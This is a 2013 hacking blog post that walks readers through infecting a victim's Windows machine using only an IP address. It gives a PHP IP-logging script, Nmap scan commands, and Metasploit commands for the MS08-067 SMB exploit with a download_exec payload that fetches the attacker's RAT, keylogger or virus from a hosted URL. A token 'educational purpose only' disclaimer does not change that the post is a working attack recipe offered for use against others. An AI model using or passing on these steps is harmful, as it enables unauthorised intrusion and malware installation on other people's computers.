|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Saturday, October 5, 2013

Infect I.P Using Metasploit.


Using this tutorial, you can put your rats, keyloggers, ddos files and anything in your victim's computer using his or her IP address only.
   
              This is a very dangerous post, :p This is posted only for educational purpose only... But attempting the attack to attack someone else IP and get yourself in trouble, then I (Chinmoy Pratim Borah) and my blog (Wild Wings Hackers) is not responsible. :D :p

In this tutorial you will need two things..

1. NAMP
2. Metasploit

Just Google It, And Download.. :D

=====================================================================

1. First we need to find victms IP.
2. Script for stealing IP adress or Other Tools for Get victims IP :

$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>
3. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...

3. Now we scan victms IP
So in metasploit type 'Nmap'

Next command is 'nmap -sT -sV ' (in '' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...

If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit

In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)

Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'

Than type 'Show options'
You will se enough of options, fill only RHOST i URL.

Type: set RHOST 

Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stealer, virus what is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'


No comments:

Post a Comment